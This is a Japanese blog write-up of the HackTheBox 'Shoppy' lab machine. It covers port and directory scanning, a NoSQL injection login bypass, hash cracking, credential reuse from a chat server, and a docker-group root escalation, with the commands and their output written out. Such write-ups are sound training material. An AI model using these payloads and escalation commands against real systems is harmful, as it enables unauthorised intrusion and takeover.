Zenn
🔥

HackTheBox Shoppy

2023/01/15に公開
Linux
Security
#
hackthebox
#
htb
#
shoppy
tech

Shoppy

侵入

nmap

ポートスキャン

┌──(kali㉿kali)-[~/Desktop/Shoppy]
└─$ sudo nmap -Pn -n -v --reason -sS -p- --min-rate=1000 -A 10.10.11.180 -oN nmap.log
PORT     STATE SERVICE  REASON         VERSION
22/tcp   open  ssh      syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 9e:5e:83:51:d9:9f:89:ea:47:1a:12:eb:81:f9:22:c0 (RSA)
|   256 58:57:ee:eb:06:50:03:7c:84:63:d7:a3:41:5b:1a:d5 (ECDSA)
|_  256 3e:9d:0a:42:90:44:38:60:b3:b6:2c:e9:bd:9a:67:54 (ED25519)
80/tcp   open  http     syn-ack ttl 63 nginx 1.23.1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
9093/tcp open  copycat? syn-ack ttl 63
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/plain; version=0.0.4; charset=utf-8
|     Date: Fri, 07 Oct 2022 05:29:17 GMT
|     HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
|     TYPE go_gc_cycles_automatic_gc_cycles_total counter
|     go_gc_cycles_automatic_gc_cycles_total 6
|     HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
|     TYPE go_gc_cycles_forced_gc_cycles_total counter
|     go_gc_cycles_forced_gc_cycles_total 0
|     HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
|     TYPE go_gc_cycles_total_gc_cycles_total counter
|     go_gc_cycles_total_gc_cycles_total 6
|     HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
|     TYPE go_gc_duration_seconds summary
|     go_gc_duration_seconds{quantile="0"} 3.9468e-05
|     go_gc_duration_seconds{quantile="0.25"} 5.5801e-05
|     go_gc_dur
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Content-Type: text/plain; version=0.0.4; charset=utf-8
|     Date: Fri, 07 Oct 2022 05:29:18 GMT
|     HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
|     TYPE go_gc_cycles_automatic_gc_cycles_total counter
|     go_gc_cycles_automatic_gc_cycles_total 6
|     HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
|     TYPE go_gc_cycles_forced_gc_cycles_total counter
|     go_gc_cycles_forced_gc_cycles_total 0
|     HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
|     TYPE go_gc_cycles_total_gc_cycles_total counter
|     go_gc_cycles_total_gc_cycles_total 6
|     HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
|     TYPE go_gc_duration_seconds summary
|     go_gc_duration_seconds{quantile="0"} 3.9468e-05
|     go_gc_duration_seconds{quantile="0.25"} 5.5801e-05
|_    go_gc_dur

22、80、9093番ポートを確認

web


9093番にもアクセスしてみる

特に情報はなさそう

dir

ディレクトリ探索を行う

┌──(kali㉿kali)-[~/Desktop/Shoppy]
└─$ gobuster dir -u http://shoppy.htb/ -w /usr/share/wordlists/dirb/common.txt -o gobuster_dir.log 2>/dev/null
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://shoppy.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/10/07 14:35:06 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 302) [Size: 28] [--> /login]
/Admin                (Status: 302) [Size: 28] [--> /login]
/ADMIN                (Status: 302) [Size: 28] [--> /login]
/assets               (Status: 301) [Size: 179] [--> /assets/]
/css                  (Status: 301) [Size: 173] [--> /css/]   
/exports              (Status: 301) [Size: 181] [--> /exports/]
/favicon.ico          (Status: 200) [Size: 213054]             
/fonts                (Status: 301) [Size: 177] [--> /fonts/]  
/images               (Status: 301) [Size: 179] [--> /images/] 
/js                   (Status: 301) [Size: 171] [--> /js/]     
/login                (Status: 200) [Size: 1074]               
/Login                (Status: 200) [Size: 1074]               
===============================================================
2022/10/07 14:36:30 Finished
===============================================================

login を発見

login


ログインページが出力された

POST /login HTTP/1.1
Host: shoppy.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
Origin: http://shoppy.htb
Connection: close
Referer: http://shoppy.htb/login
Upgrade-Insecure-Requests: 1

username=admin'||'1==1&password=password

Burp Suite でリクエストを作成し、NoSQL インジェクションを試してみる

Found. Redirecting to <a href="/admin">/admin</a>

admin ページにリダイレクトされるため、成功したことがわかる

admin


右上に、Search for users というボタンを確認

ボタンを押下し、admin と入力する。続けて、Downloads exports をクリック

ハッシュ化されたパスワードが確認できた
他のユーザを確認するために、NoSQLインジェクションと同じ文字列を入力

josh ユーザのパスワードを発見

hashcat

ハッシュ化を解読するために、rockyou.txt を使用し、hashcat を実行

┌──(kali㉿kali)-[~/Desktop/Shoppy]
└─$ hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
===============================================================
6ebcea65320589ca4f2f1ce039975995:remembermethisway
===============================================================

remembermethisway という文字列で解読された

vhost

ssh 接続を試してみたが、失敗したので、他の情報を探すため列挙を続行

┌──(kali㉿kali)-[~/Desktop/Shoppy]
└─$ gobuster vhost -u http://shoppy.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 150 2>/dev/null -o gobuster_vhost.log
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://shoppy.htb/
[+] Method:       GET
[+] Threads:      150
[+] Wordlist:     /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/10/07 15:10:51 Starting gobuster in VHOST enumeration mode
===============================================================
===============================================================
2022/10/07 15:13:14 Finished
===============================================================

何もヒットしない。しばらく何もわからない時間が続いた

┌──(kali㉿kali)-[~/Desktop/Shoppy]
└─$ gobuster vhost -u http://shoppy.htb/ -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -t 150 2>/dev/null -o gobuster_vhost.log 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://shoppy.htb/
[+] Method:       GET
[+] Threads:      150
[+] Wordlist:     /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/10/07 15:18:33 Starting gobuster in VHOST enumeration mode
===============================================================
Found: mattermost.shoppy.htb (Status: 200) [Size: 3122]
===============================================================
2022/10/07 15:20:51 Finished
===============================================================

試しに、ワードリストを変更し、サブドメインを探すと、mattermost でヒットした

mattermost


ログイン画面が表示された

先ほど得た、josh の認証情報を使用することで、ログイン成功した

しばらく探索すると、サーバへの認証情報が書かれたチャットを発見

Hey @josh,

For the deploy machine, you can create an account with these creds :
username: jaeger
password: Sh0ppyBest@pp!
And deploy on it.

jaeger としてのシェル

SSH

チャットで発見した認証情報を使用

┌──(kali㉿kali)-[~/Desktop/Shoppy]
└─$ ssh jaeger@10.10.11.180                                                                                               130 ⨯
jaeger@10.10.11.180's password: 
Linux shoppy 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jaeger@shoppy:~$ whoami
jaeger

侵入成功

user フラグ

jaeger@shoppy:~$ cat user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

フラグ取得成功

列挙

sudo -l

jaeger@shoppy:~$ sudo -l
[sudo] password for jaeger: 
Matching Defaults entries for jaeger on shoppy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jaeger may run the following commands on shoppy:
    (deploy) /home/deploy/password-manager

deploy の password-manager を sudo -u で実行できそう

password-manager

とりあえず中身を見てみる

jaeger@shoppy:/home/deploy$ cat password-manager
Welcome to Josh password manager!
Please enter your master password: 
SampleAccess granted! 
Here is creds !
cat /home/deploy/creds.txtAccess denied! 
This incident will be reported !

大部分は読むことができないが、上記の部分からパスワードが求められることがわかる
Sample という文字の後に、Access granted! と書いてあることから、そのまま使えるかもしれない

jaeger@shoppy:/home/deploy$ sudo -u deploy /home/deploy/password-manager
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: Deploying@pp!

認証に成功し、deploy の情報が表示された

deploy としてのシェル

SSH

先程の情報を使用し、再び SSH 接続を行う

┌──(kali㉿kali)-[~/Desktop/Shoppy]
└─$ ssh deploy@10.10.11.180     
deploy@10.10.11.180's password: 
Linux shoppy 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
$ whoami
deploy

シェル取得成功

権限昇格

id

いつものフローで手がかりが見つからず、何気なく id コマンドを実行

$ id
uid=1001(deploy) gid=1001(deploy) groups=1001(deploy),998(docker)

docker の出力を確認
Web でチャットを深く読むと、docker をインストールしたという内容を発見

root としてのシェル

docker run

GTFOBins を参考に、権限昇格を目指す

$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh 
# whoami
root

権限昇格成功

root フラグ

# cat root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

フラグ取得成功

所感

今回のボックスは、全体的にそこまで難しさを感じなかったが、サブドメインの探索やidコマンドの部分で時間をかけてしまったので、有力なワードリストをまとめるなどして次回以降の攻略に役立てていきたい。NoSQLインジェクションは得意分野なのでうまく発火させることができてよかった。

Discussion